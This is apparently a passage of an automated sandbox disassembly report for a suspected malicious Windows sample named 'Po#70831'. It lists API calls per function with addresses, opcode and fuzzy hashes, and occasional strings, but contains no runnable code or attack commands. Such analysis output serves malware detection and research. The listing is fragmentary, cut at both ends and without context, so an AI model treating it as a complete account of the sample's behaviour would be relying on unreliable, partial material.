                                      • _wcslen.LIBCMT ref: 004FD01B
                                      • SHFileOperationW.SHELL32(?), ref: 004FD061
                                      Strings
                                      Similarity
                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                      • String ID: \*.*
                                      • API String ID: 3164238972-1173974218
                                      • Opcode ID: 71e13fa3cb8c76b2ce513df8791214fb8dff97184e72afd6bcf3389be582dad2
                                      • Instruction ID: 86f542b51ebc9ff307ff6e37fce77a93a3fc7e0a71e40b53b39ca721d6f4ade2
                                      • Opcode Fuzzy Hash: 71e13fa3cb8c76b2ce513df8791214fb8dff97184e72afd6bcf3389be582dad2
                                      • Instruction Fuzzy Hash: B6415A71D0511C5FDF12EBA5CE81AEEB7B9AF04344F0000EBE605E7152EB38A649CB65
                                      APIs
                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00522E1C
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00522E4F
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00522E84
                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00522EB6
                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00522EE0
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00522EF1
                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00522F0B
                                      Similarity
                                      • API ID: LongWindow$MessageSend
                                      • String ID:
                                      • API String ID: 2178440468-0
                                      • Opcode ID: fbb6193e0d7b823dcaf49bec0f43ce950d1bdad4cfd6cbed66eba3eccb53dde4
                                      • Instruction ID: 5de8ca365efc91ddb0d39fef4beb0791c07b01f0ca50094aab425b77982a24cd
                                      • Opcode Fuzzy Hash: fbb6193e0d7b823dcaf49bec0f43ce950d1bdad4cfd6cbed66eba3eccb53dde4
                                      • Instruction Fuzzy Hash: 6931F839604160AFDB218F58EC84F753BE5FF6A710F1A0164F5148F2B2CBB1A845AF41
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F7769
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F778F
                                      • SysAllocString.OLEAUT32(00000000), ref: 004F7792
                                      • SysAllocString.OLEAUT32(?), ref: 004F77B0
                                      • SysFreeString.OLEAUT32(?), ref: 004F77B9
                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 004F77DE
                                      • SysAllocString.OLEAUT32(?), ref: 004F77EC
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      • Opcode ID: e87a42c2a0d998f2d87d82cb76182b14084eee8f80a466672542940fd371d2d9
                                      • Instruction ID: 1e864e129313bd7d6fd2118faf1f32799d9971383f227934bf4c5202cffd475e
                                      • Opcode Fuzzy Hash: e87a42c2a0d998f2d87d82cb76182b14084eee8f80a466672542940fd371d2d9
                                      • Instruction Fuzzy Hash: 16219476604219AFDF10EFA9CC44CBB77ECEF193647108026FA04DB251D678AC4687A4
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F7842
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F7868
                                      • SysAllocString.OLEAUT32(00000000), ref: 004F786B
                                      • SysAllocString.OLEAUT32 ref: 004F788C
                                      • SysFreeString.OLEAUT32 ref: 004F7895
                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 004F78AF
                                      • SysAllocString.OLEAUT32(?), ref: 004F78BD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      • Opcode ID: 1b4d6107f8159fcb346f627d212c27757abd50dd7c659dab0dd6a11ae4d17e40
                                      • Instruction ID: dec90c3396d42e8259320582d58fa4b3ce96177cdb4e0e14887baf12c71f1e9b
                                      • Opcode Fuzzy Hash: 1b4d6107f8159fcb346f627d212c27757abd50dd7c659dab0dd6a11ae4d17e40
                                      • Instruction Fuzzy Hash: 35217931604108AFDF10AFA8DC89D7B77ECEF197607108126FA15CB2A1D678DC45DB68
                                      APIs
                                      • GetStdHandle.KERNEL32(0000000C), ref: 005004F2
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0050052E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CreateHandlePipe
                                      • String ID: nul
                                      • API String ID: 1424370930-2873401336
                                      • Opcode ID: dc7204d253e11213ee1fada8a3f77acb2ea236ae33b18f5fdfb2e801311ffaab
                                      • Instruction ID: b30eaef333a333746c43c4b4be450367f55dd5b590ae4b89d6b5388c8bec9b46
                                      • Opcode Fuzzy Hash: dc7204d253e11213ee1fada8a3f77acb2ea236ae33b18f5fdfb2e801311ffaab
                                      • Instruction Fuzzy Hash: 3A217A75500305ABDF208F29DC44BAE7FB4BF55724F204A29E8A1D62E0E7709945DF20
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 005005C6
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00500601
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CreateHandlePipe
                                      • String ID: nul
                                      • API String ID: 1424370930-2873401336
                                      • Opcode ID: 34bc4c708003e989967865d586303d35bb7d8145e667a3446fff51fb7d2783f0
                                      • Instruction ID: 9211316cdc8ffa16e7fa150093632492d557c730f4da060281c8068bd3a92659
                                      • Opcode Fuzzy Hash: 34bc4c708003e989967865d586303d35bb7d8145e667a3446fff51fb7d2783f0
                                      • Instruction Fuzzy Hash: 43218E755003059BDB209F69DC04BAE7FE9BF95720F201A19F8A1E72E0DBB19961DB20
                                      APIs
                                        • Part of subcall function 0049600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0049604C
                                        • Part of subcall function 0049600E: GetStockObject.GDI32(00000011), ref: 00496060
                                        • Part of subcall function 0049600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0049606A
                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00524112
                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0052411F
                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0052412A
                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00524139
                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00524145
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend$CreateObjectStockWindow
                                      • String ID: Msctls_Progress32
                                      • API String ID: 1025951953-3636473452
                                      • Opcode ID: c5f7540d287b847dbc868cf4b3bfd6ed74c01549a09e49fe398b254f1bea3f54
                                      • Instruction ID: 4cd1e719be348e651181bc6d33c2c91e6e2c649bb682e7208148fc8a2caf9b9f
                                      • Opcode Fuzzy Hash: c5f7540d287b847dbc868cf4b3bfd6ed74c01549a09e49fe398b254f1bea3f54
                                      • Instruction Fuzzy Hash: 681193B11402297EEF118F64DC85EE77F5DFF19798F014111FA18A6090C6729C61DBA4
                                      APIs
                                        • Part of subcall function 004CD7A3: _free.LIBCMT ref: 004CD7CC
                                      • _free.LIBCMT ref: 004CD82D
                                        • Part of subcall function 004C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000), ref: 004C29DE
                                        • Part of subcall function 004C29C8: GetLastError.KERNEL32(00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000,00000000), ref: 004C29F0
                                      • _free.LIBCMT ref: 004CD838
                                      • _free.LIBCMT ref: 004CD843
                                      • _free.LIBCMT ref: 004CD897
                                      • _free.LIBCMT ref: 004CD8A2
                                      • _free.LIBCMT ref: 004CD8AD
                                      • _free.LIBCMT ref: 004CD8B8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                      • Instruction ID: 4d066e47518058557c2ef73a3f1c3f1beec7bf5a227613638fb17e4e5c8499c6
                                      • Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                      • Instruction Fuzzy Hash: 5C1154B9941704AAD5A1BFB2CC47FCB7BDCAF00704F40083EB29DA6492D6BDB5054654
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 004FDA74
                                      • LoadStringW.USER32(00000000), ref: 004FDA7B
                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004FDA91
                                      • LoadStringW.USER32(00000000), ref: 004FDA98
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004FDADC
                                      Strings
                                      • %s (%d) : ==> %s: %s %s, xrefs: 004FDAB9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message
                                      • String ID: %s (%d) : ==> %s: %s %s
                                      • API String ID: 4072794657-3128320259
                                      • Opcode ID: 1a41cd24721ecbf9eba276e8ca8ec627b7b9607794d15bcdba627d0552268d92
                                      • Instruction ID: d01fc85357bce40a7cff27787d46c1f16c327f1c4ce6573b05c33f8dcf0391b4
                                      • Opcode Fuzzy Hash: 1a41cd24721ecbf9eba276e8ca8ec627b7b9607794d15bcdba627d0552268d92
                                      • Instruction Fuzzy Hash: 03018BF29002087FEB1097A49D89EFF3B6CEF05301F400496B705E2042E6749D898F74
                                      APIs
                                      • InterlockedExchange.KERNEL32(0117F0A0,0117F0A0), ref: 0050097B
                                      • EnterCriticalSection.KERNEL32(0117F080,00000000), ref: 0050098D
                                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 0050099B
                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 005009A9
                                      • CloseHandle.KERNEL32(00000000), ref: 005009B8
                                      • InterlockedExchange.KERNEL32(0117F0A0,000001F6), ref: 005009C8
                                      • LeaveCriticalSection.KERNEL32(0117F080), ref: 005009CF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                      • String ID:
                                      • API String ID: 3495660284-0
                                      • Opcode ID: 31ba6e3417a8199eb583fd0bba853fded33583458d62e4e9e2e48d2ecf8700ce
                                      • Instruction ID: 61fee15206d01c94a75e4f649128517a16eb4a54cd570a67bc71c74a7bbbf484
                                      • Opcode Fuzzy Hash: 31ba6e3417a8199eb583fd0bba853fded33583458d62e4e9e2e48d2ecf8700ce
                                      • Instruction Fuzzy Hash: EFF01D31442902EBD7615B94EE89BDE7E25BF12702F502415F101518A2CB74946ADF90
                                      APIs
                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00511DC0
                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00511DE1
                                      • WSAGetLastError.WSOCK32 ref: 00511DF2
                                      • htons.WSOCK32(?,?,?,?,?), ref: 00511EDB
                                      • inet_ntoa.WSOCK32(?), ref: 00511E8C
                                        • Part of subcall function 004F39E8: _strlen.LIBCMT ref: 004F39F2
                                        • Part of subcall function 00513224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0050EC0C), ref: 00513240
                                      • _strlen.LIBCMT ref: 00511F35
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                      • String ID:
                                      • API String ID: 3203458085-0
                                      • Opcode ID: 021d3461e04de8ebd7db232b930f232fdb5f8f11d07336e6d48bce5c587f30be
                                      • Instruction ID: 3aaf444ed426e5ef168957ff91ea89390fe4494a457cf2d1ac1b5ffebaa62234
                                      • Opcode Fuzzy Hash: 021d3461e04de8ebd7db232b930f232fdb5f8f11d07336e6d48bce5c587f30be
                                      • Instruction Fuzzy Hash: 80B10030204700AFD720EF25C885E6A7FA5BF85318F54899DF5564B2E2CB35ED82CBA5
                                      APIs
                                      • __allrem.LIBCMT ref: 004C00BA
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004C00D6
                                      • __allrem.LIBCMT ref: 004C00ED
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004C010B
                                      • __allrem.LIBCMT ref: 004C0122
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004C0140
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 1992179935-0
                                      • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                      • Instruction ID: 05260aa2b943cafabc9c73334712cc8e173e64e9edc306536797cdc28cc92d33
                                      • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                      • Instruction Fuzzy Hash: 7581F3796007069BE7609E6ACC42FABB3A8EF41728F24413FF455D7381EB79D9008798
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,004B82D9,004B82D9,?,?,?,004C644F,00000001,00000001,8BE85006), ref: 004C6258
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004C644F,00000001,00000001,8BE85006,?,?,?), ref: 004C62DE
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004C63D8
                                      • __freea.LIBCMT ref: 004C63E5
                                        • Part of subcall function 004C3820: RtlAllocateHeap.NTDLL(00000000,?,00561444,?,004AFDF5,?,?,0049A976,00000010,00561440,004913FC,?,004913C6,?,00491129), ref: 004C3852
                                      • __freea.LIBCMT ref: 004C63EE
                                      • __freea.LIBCMT ref: 004C6413
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                      • String ID:
                                      • API String ID: 1414292761-0
                                      • Opcode ID: 5e048141163f6e6fc7539e25c89e5e266a30d913102fd6d8e008002229fe6890
                                      • Instruction ID: 3a69061f96bb5ec70d94a2ef1ac1b2e68612985de54ce5ccf2b4affe5b1b469b
                                      • Opcode Fuzzy Hash: 5e048141163f6e6fc7539e25c89e5e266a30d913102fd6d8e008002229fe6890
                                      • Instruction Fuzzy Hash: 47511376600202ABEB258F64CC81FBF7BA9EF44710F16822EFC05D6291DB38DC40C668
                                      APIs
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                        • Part of subcall function 0051C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0051B6AE,?,?), ref: 0051C9B5
                                        • Part of subcall function 0051C998: _wcslen.LIBCMT ref: 0051C9F1
                                        • Part of subcall function 0051C998: _wcslen.LIBCMT ref: 0051CA68
                                        • Part of subcall function 0051C998: _wcslen.LIBCMT ref: 0051CA9E
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0051BCCA
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0051BD25
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0051BD6A
                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0051BD99
                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0051BDF3
                                      • RegCloseKey.ADVAPI32(?), ref: 0051BDFF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                      • String ID:
                                      • API String ID: 1120388591-0
                                      APIs
                                      • VariantInit.OLEAUT32(00000035), ref: 004EF7B9
                                      • SysAllocString.OLEAUT32(00000001), ref: 004EF860
                                      • VariantCopy.OLEAUT32(004EFA64,00000000), ref: 004EF889
                                      • VariantClear.OLEAUT32(004EFA64), ref: 004EF8AD
                                      • VariantCopy.OLEAUT32(004EFA64,00000000), ref: 004EF8B1
                                      • VariantClear.OLEAUT32(?), ref: 004EF8BB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCopy$AllocInitString
                                      • String ID:
                                      • API String ID: 3859894641-0
                                      APIs
                                        • Part of subcall function 00497620: _wcslen.LIBCMT ref: 00497625
                                        • Part of subcall function 00496B57: _wcslen.LIBCMT ref: 00496B6A
                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 005094E5
                                      • _wcslen.LIBCMT ref: 00509506
                                      • _wcslen.LIBCMT ref: 0050952D
                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00509585
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _wcslen$FileName$OpenSave
                                      • String ID: X
                                      • API String ID: 83654149-3081909835
                                      APIs
                                        • Part of subcall function 004A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 004A9BB2
                                      • BeginPaint.USER32(?,?,?), ref: 004A9241
                                      • GetWindowRect.USER32(?,?), ref: 004A92A5
                                      • ScreenToClient.USER32(?,?), ref: 004A92C2
                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004A92D3
                                      • EndPaint.USER32(?,?,?,?,?), ref: 004A9321
                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004E71EA
                                        • Part of subcall function 004A9339: BeginPath.GDI32(00000000), ref: 004A9357
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                      • String ID:
                                      • API String ID: 3050599898-0
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 0050080C
                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00500847
                                      • EnterCriticalSection.KERNEL32(?), ref: 00500863
                                      • LeaveCriticalSection.KERNEL32(?), ref: 005008DC
                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 005008F3
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00500921
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                      • String ID:
                                      • API String ID: 3368777196-0
                                      APIs
                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,004EF3AB,00000000,?,?,00000000,?,004E682C,00000004,00000000,00000000), ref: 0052824C
                                      • EnableWindow.USER32(00000000,00000000), ref: 00528272
                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 005282D1
                                      • ShowWindow.USER32(00000000,00000004), ref: 005282E5
                                      • EnableWindow.USER32(00000000,00000001), ref: 0052830B
                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0052832F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$Show$Enable$MessageSend
                                      • String ID:
                                      • API String ID: 642888154-0
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 004F4C95
                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004F4CB2
                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004F4CEA
                                      • _wcslen.LIBCMT ref: 004F4D08
                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 004F4D10
                                      • _wcsstr.LIBVCRUNTIME ref: 004F4D1A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                      • String ID:
                                      • API String ID: 72514467-0
                                      APIs
                                        • Part of subcall function 00493AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00493A97,?,?,00492E7F,?,?,?,00000000), ref: 00493AC2
                                      • _wcslen.LIBCMT ref: 0050587B
                                      • CoInitialize.OLE32(00000000), ref: 00505995
                                      • CoCreateInstance.OLE32(0052FCF8,00000000,00000001,0052FB68,?), ref: 005059AE
                                      • CoUninitialize.OLE32 ref: 005059CC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                      • String ID: .lnk
                                      • API String ID: 3172280962-24824748
                                      APIs
                                        • Part of subcall function 004F0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004F0FCA
                                        • Part of subcall function 004F0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004F0FD6
                                        • Part of subcall function 004F0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004F0FE5
                                        • Part of subcall function 004F0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004F0FEC
                                        • Part of subcall function 004F0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004F1002
                                      • GetLengthSid.ADVAPI32(?,00000000,004F1335), ref: 004F17AE
                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004F17BA
                                      • HeapAlloc.KERNEL32(00000000), ref: 004F17C1
                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 004F17DA
                                      • GetProcessHeap.KERNEL32(00000000,00000000,004F1335), ref: 004F17EE
                                      • HeapFree.KERNEL32(00000000), ref: 004F17F5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                      • String ID:
                                      • API String ID: 3008561057-0
                                      APIs
                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004F14FF
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004F1506
                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004F1515
                                      • CloseHandle.KERNEL32(00000004), ref: 004F1520
                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004F154F
                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 004F1563
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                      • String ID:
                                      • API String ID: 1413079979-0
                                      APIs
                                      • GetLastError.KERNEL32(?,?,004B3379,004B2FE5), ref: 004B3390
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004B339E
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004B33B7
                                      • SetLastError.KERNEL32(00000000,?,004B3379,004B2FE5), ref: 004B3409
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      APIs
                                      • GetLastError.KERNEL32(?,?,004C5686,004D3CD6,?,00000000,?,004C5B6A,?,?,?,?,?,004BE6D1,?,00558A48), ref: 004C2D78
                                      • _free.LIBCMT ref: 004C2DAB
                                      • _free.LIBCMT ref: 004C2DD3
                                      • SetLastError.KERNEL32(00000000,?,?,?,?,004BE6D1,?,00558A48,00000010,00494F4A,?,?,00000000,004D3CD6), ref: 004C2DE0
                                      • SetLastError.KERNEL32(00000000,?,?,?,?,004BE6D1,?,00558A48,00000010,00494F4A,?,?,00000000,004D3CD6), ref: 004C2DEC
                                      • _abort.LIBCMT ref: 004C2DF2
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      APIs
                                        • Part of subcall function 004A9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 004A9693
                                        • Part of subcall function 004A9639: SelectObject.GDI32(?,00000000), ref: 004A96A2
                                        • Part of subcall function 004A9639: BeginPath.GDI32(?), ref: 004A96B9
                                        • Part of subcall function 004A9639: SelectObject.GDI32(?,00000000), ref: 004A96E2
                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00528A4E
                                      • LineTo.GDI32(?,00000003,00000000), ref: 00528A62
                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00528A70
                                      • LineTo.GDI32(?,00000000,00000003), ref: 00528A80
                                      • EndPath.GDI32(?), ref: 00528A90
                                      • StrokePath.GDI32(?), ref: 00528AA0
                                      Similarity
                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                      • String ID:
                                      • API String ID: 43455801-0
                                      APIs
                                      • GetDC.USER32(00000000), ref: 004F5218
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 004F5229
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004F5230
                                      • ReleaseDC.USER32(00000000,00000000), ref: 004F5238
